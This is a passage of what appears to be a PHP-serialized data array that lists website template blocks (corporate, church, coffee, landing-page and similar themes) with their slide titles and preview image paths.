1\";s:3:\"img\";s:29:\"medicare-whychoose/slide1.jpg\";}}s:16:\"medicare-contact\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"medicare-contact/slide1.jpg\";}}s:15:\"medicare-footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"medicare-footer/slide1.jpg\";}}s:11:\"coffee-menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"coffee-menu/slide1.jpg\";}}s:13:\"coffee-header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"coffee-header/slide1.jpg\";}}s:17:\"coffee-philosophy\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"coffee-philosophy/slide1.jpg\";}}s:12:\"coffee-carte\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"coffee-carte/slide1.jpg\";}}s:13:\"coffee-teaser\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"coffee-teaser/slide1.jpg\";}}s:13:\"coffee-findus\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"coffee-findus/slide1.jpg\";}}s:13:\"coffee-footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"coffee-footer/slide1.jpg\";}}s:17:\"minimal-portfolio\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"minimal-portfolio/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:28:\"minimal-portfolio/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:28:\"minimal-portfolio/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:28:\"minimal-portfolio/slide4.jpg\";}}s:23:\"minimal-portfolio-modal\";a:7:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"minimal-portfolio-modal/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:34:\"minimal-portfolio-modal/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:34:\"minimal-portfolio-modal/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:34:\"minimal-portfolio-modal/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:34:\"minimal-portfolio-modal/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:34:\"minimal-portfolio-modal/slide6.jpg\";}i:6;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:34:\"minimal-portfolio-modal/slide7.jpg\";}}s:11:\"angled-menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"angled-menu/slide1.jpg\";}}s:13:\"angled-header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"angled-header/slide1.jpg\";}}s:11:\"angled-news\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"angled-news/slide1.jpg\";}}s:15:\"angled-services\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"angled-services/slide1.jpg\";}}s:14:\"angled-success\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"angled-success/slide1.jpg\";}}s:13:\"angled-footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"angled-footer/slide1.jpg\";}}s:20:\"angled-content-modal\";a:6:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:31:\"angled-content-modal/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:31:\"angled-content-modal/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:31:\"angled-content-modal/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:31:\"angled-content-modal/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:31:\"angled-content-modal/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:31:\"angled-content-modal/slide6.jpg\";}}s:13:\"big-bold-menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"big-bold-menu/slide1.jpg\";}}s:15:\"big-bold-header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"big-bold-header/slide1.jpg\";}}s:16:\"big-bold-content\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"big-bold-content/slide1.jpg\";}}s:13:\"big-bold-blog\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"big-bold-blog/slide1.jpg\";}}s:18:\"big-bold-highlight\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"big-bold-highlight/slide1.jpg\";}}s:15:\"big-bold-footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"big-bold-footer/slide1.jpg\";}}s:7:\"Retouch\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:18:\"Retouch/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:18:\"Retouch/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:18:\"Retouch/slide3.jpg\";}}s:11:\"tech-slider\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"tech-slider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:22:\"tech-slider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:22:\"tech-slider/slide3.jpg\";}}s:11:\"peak-header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"peak-header/slide1.jpg\";}}s:10:\"peak-about\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:21:\"peak-about/slide1.jpg\";}}s:14:\"peak-portfolio\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"peak-portfolio/slide1.jpg\";}}s:11:\"peak-footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"peak-footer/slide1.jpg\";}}s:17:\"portfolio-welcome\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"portfolio-welcome/slide1.jpg\";}}s:15:\"portfolio-about\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"portfolio-about/slide1.jpg\";}}s:21:\"portfolio-works-title\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"portfolio-works-title/slide1.jpg\";}}s:23:\"portfolio-works-content\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"portfolio-works-content/slide1.jpg\";}}s:18:\"portfolio-contacts\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"portfolio-contacts/slide1.jpg\";}}s:18:\"App-Studio-Welcome\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"App-Studio-Welcome/slide1.jpg\";}}s:19:\"App-Studio-Services\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"App-Studio-Services/slide1.jpg\";}}s:16:\"App-Studio-About\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"App-Studio-About/slide1.jpg\";}}s:19:\"App-Studio-Contacts\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"App-Studio-Contacts/slide1.jpg\";}}s:14:\"cube-animation\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"cube-animation/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:25:\"cube-animation/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:25:\"cube-animation/slide3.jpg\";}}s:10:\"basic-menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:21:\"basic-menu/slide1.jpg\";}}s:12:\"basic-header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"basic-header/slide1.jpg\";}}s:13:\"basic-content\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"basic-content/slide1.jpg\";}}s:14:\"basic-carousel\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"basic-carousel/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:25:\"basic-carousel/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:25:\"basic-carousel/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:25:\"basic-carousel/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:25:\"basic-carousel/slide5.jpg\";}}s:13:\"basic-callout\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"basic-callout/slide1.jpg\";}}s:10:\"basic-grid\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:21:\"basic-grid/slide1.jpg\";}}s:17:\"basic-video-block\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"basic-video-block/slide1.jpg\";}}s:12:\"basic-footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"basic-footer/slide1.jpg\";}}s:14:\"basic-lightbox\";a:6:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"basic-lightbox/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:25:\"basic-lightbox/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:25:\"basic-lightbox/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:25:\"basic-lightbox/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:25:\"basic-lightbox/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:25:\"basic-lightbox/slide6.jpg\";}}s:13:\"nature-slider\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"nature-slider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:24:\"nature-slider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:24:\"nature-slider/slide3.jpg\";}}s:11:\"art-gallery\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"art-gallery/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:22:\"art-gallery/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:22:\"art-gallery/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:22:\"art-gallery/slide4.jpg\";}}s:19:\"Construction-Header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"Construction-Header/slide1.jpg\";}}s:17:\"Construction-Home\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"Construction-Home/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:28:\"Construction-Home/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:28:\"Construction-Home/slide3.jpg\";}}s:21:\"Construction-Projects\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"Construction-Projects/slide1.jpg\";}}s:20:\"Construction-History\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:31:\"Construction-History/slide1.jpg\";}}s:21:\"Construction-Services\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"Construction-Services/slide1.jpg\";}}s:21:\"Construction-Contacts\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"Construction-Contacts/slide1.jpg\";}}s:21:\"404-Error-Space-Theme\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"404-Error-Space-Theme/slide1.jpg\";}}s:17:\"landing-page-hero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"landing-page-hero/slide1.jpg\";}}s:21:\"landing-page-features\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"landing-page-features/slide1.jpg\";}}s:20:\"landing-page-callout\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:31:\"landing-page-callout/slide1.jpg\";}}s:20:\"landing-page-content\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:31:\"landing-page-content/slide1.jpg\";}}s:25:\"landing-page-testimonials\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:36:\"landing-page-testimonials/slide1.jpg\";}}s:27:\"landing-page-call-to-action\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:38:\"landing-page-call-to-action/slide1.jpg\";}}s:17:\"landing-page-help\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"landing-page-help/slide1.jpg\";}}s:19:\"landing-page-footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"landing-page-footer/slide1.jpg\";}}s:24:\"landing-page-price-modal\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:35:\"landing-page-price-modal/slide1.jpg\";}}s:18:\"energy-drinks-hero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"energy-drinks-hero/slide1.jpg\";}}s:19:\"energy-drinks-about\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"energy-drinks-about/slide1.jpg\";}}s:21:\"energy-drinks-product\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"energy-drinks-product/slide1.jpg\";}}s:23:\"energy-drinks-product-2\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"energy-drinks-product-2/slide1.jpg\";}}s:23:\"energy-drinks-product-3\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"energy-drinks-product-3/slide1.jpg\";}}s:19:\"energy-drinks-order\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"energy-drinks-order/slide1.jpg\";}}s:20:\"energy-drinks-footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:31:\"energy-drinks-footer/slide1.jpg\";}}s:19:\"energy-drinks-modal\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"energy-drinks-modal/slide1.jpg\";}}s:16:\"Corporate-Header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"Corporate-Header/slide1.jpg\";}}s:24:\"Corporate-Welcome-Screen\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:35:\"Corporate-Welcome-Screen/slide1.jpg\";}}s:15:\"Corporate-About\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"Corporate-About/slide1.jpg\";}}s:19:\"Corporate-Portfolio\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"Corporate-Portfolio/slide1.jpg\";}}s:15:\"Corporate-Chart\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"Corporate-Chart/slide1.jpg\";}}s:14:\"Corporate-News\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"Corporate-News/slide1.jpg\";}}s:16:\"Corporate-Hiring\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"Corporate-News/slide1.jpg\";}}s:22:\"Corporate-Testimonials\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"Corporate-Testimonials/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:33:\"Corporate-Testimonials/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:33:\"Corporate-Testimonials/slide3.jpg\";}}s:15:\"Corporate-Store\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"Corporate-Store/slide1.jpg\";}}s:17:\"Corporate-Support\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"Corporate-Support/slide1.jpg\";}}s:14:\"Corporate-Team\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"Corporate-Team/slide1.jpg\";}}s:33:\"Corporate-Selected-Projects-Title\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:44:\"Corporate-Selected-Projects-Title/slide1.jpg\";}}s:27:\"Corporate-Selected-Projects\";a:7:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:38:\"Corporate-Selected-Projects/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:38:\"Corporate-Selected-Projects/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:38:\"Corporate-Selected-Projects/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:38:\"Corporate-Selected-Projects/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:38:\"Corporate-Selected-Projects/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:38:\"Corporate-Selected-Projects/slide6.jpg\";}i:6;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:38:\"Corporate-Selected-Projects/slide7.jpg\";}}s:17:\"Corporate-Clients\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"Corporate-Clients/slide1.jpg\";}}s:20:\"Corporate-Text-Block\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:31:\"Corporate-Text-Block/slide1.jpg\";}}s:20:\"Corporate-Mobile-App\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:31:\"Corporate-Mobile-App/slide1.jpg\";}}s:18:\"Corporate-Contacts\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"Corporate-Contacts/slide1.jpg\";}}s:16:\"Corporate-Footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"Corporate-Footer/slide1.jpg\";}}s:23:\"Corporate-Scroll-To-Top\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"Corporate-Scroll-To-Top/slide1.jpg\";}}s:14:\"geometric-menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"geometric-menu/slide1.jpg\";}}s:14:\"geometric-hero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"geometric-hero/slide1.jpg\";}}s:14:\"geometric-grid\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"geometric-grid/slide1.jpg\";}}s:15:\"geometric-about\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"geometric-about/slide1.jpg\";}}s:15:\"geometric-texts\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"geometric-texts/slide1.jpg\";}}s:18:\"geometric-services\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"geometric-services/slide1.jpg\";}}s:17:\"geometric-texts-2\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"geometric-texts-2/slide1.jpg\";}}s:22:\"geometric-testimonials\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"geometric-testimonials/slide1.jpg\";}}s:16:\"geometric-footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"geometric-footer/slide1.jpg\";}}s:18:\"geometric-lightbox\";a:6:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"geometric-lightbox/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:29:\"geometric-lightbox/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:29:\"geometric-lightbox/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:29:\"geometric-lightbox/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:29:\"geometric-lightbox/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:29:\"geometric-lightbox/slide6.jpg\";}}s:11:\"brutal-menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"brutal-menu/slide1.jpg\";}}s:11:\"brutal-hero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"brutal-hero/slide1.jpg\";}}s:12:\"brutal-about\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"brutal-about/slide1.jpg\";}}s:16:\"brutal-highlight\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"brutal-highlight/slide1.jpg\";}}s:15:\"brutal-projects\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"brutal-projects/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:26:\"brutal-projects/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:26:\"brutal-projects/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:26:\"brutal-projects/slide4.jpg\";}}s:15:\"brutal-services\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"brutal-services/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:26:\"brutal-services/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:26:\"brutal-services/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:26:\"brutal-services/slide4.jpg\";}}s:14:\"brutal-callout\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"brutal-callout/slide1.jpg\";}}s:13:\"brutal-footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"brutal-footer/slide1.jpg\";}}s:13:\"Church-Header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"Church-Header/slide1.jpg\";}}s:22:\"Church-Upcoming-Events\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"Church-Upcoming-Events/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:33:\"Church-Upcoming-Events/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:33:\"Church-Upcoming-Events/slide3.jpg\";}}s:12:\"Church-About\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"Church-About/slide1.jpg\";}}s:14:\"Church-Pastors\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"Church-Pastors/slide1.jpg\";}}s:20:\"Church-Photo-Gallery\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:31:\"Church-Photo-Gallery/slide1.jpg\";}}s:16:\"Church-Community\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"Church-Community/slide1.jpg\";}}s:13:\"Church-Sermon\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"Church-Sermon/slide1.jpg\";}}s:15:\"Church-Contacts\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"Church-Contacts/slide1.jpg\";}}s:13:\"Church-Footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"Church-Footer/slide1.jpg\";}}s:19:\"Church-Light-Header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"Church-Light-Header/slide1.jpg\";}}s:28:\"Church-Light-Upcoming-Events\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:39:\"Church-Light-Upcoming-Events/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:39:\"Church-Light-Upcoming-Events/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:39:\"Church-Light-Upcoming-Events/slide3.jpg\";}}s:18:\"Church-Light-About\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"Church-Light-About/slide1.jpg\";}}s:20:\"Church-Light-Pastors\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:31:\"Church-Light-Pastors/slide1.jpg\";}}s:26:\"Church-Light-Photo-Gallery\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:37:\"Church-Light-Photo-Gallery/slide1.jpg\";}}s:22:\"Church-Light-Community\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"Church-Light-Community/slide1.jpg\";}}s:19:\"Church-Light-Sermon\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"Church-Light-Sermon/slide1.jpg\";}}s:21:\"Church-Light-Contacts\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"Church-Light-Contacts/slide1.jpg\";}}s:19:\"Church-Light-Footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 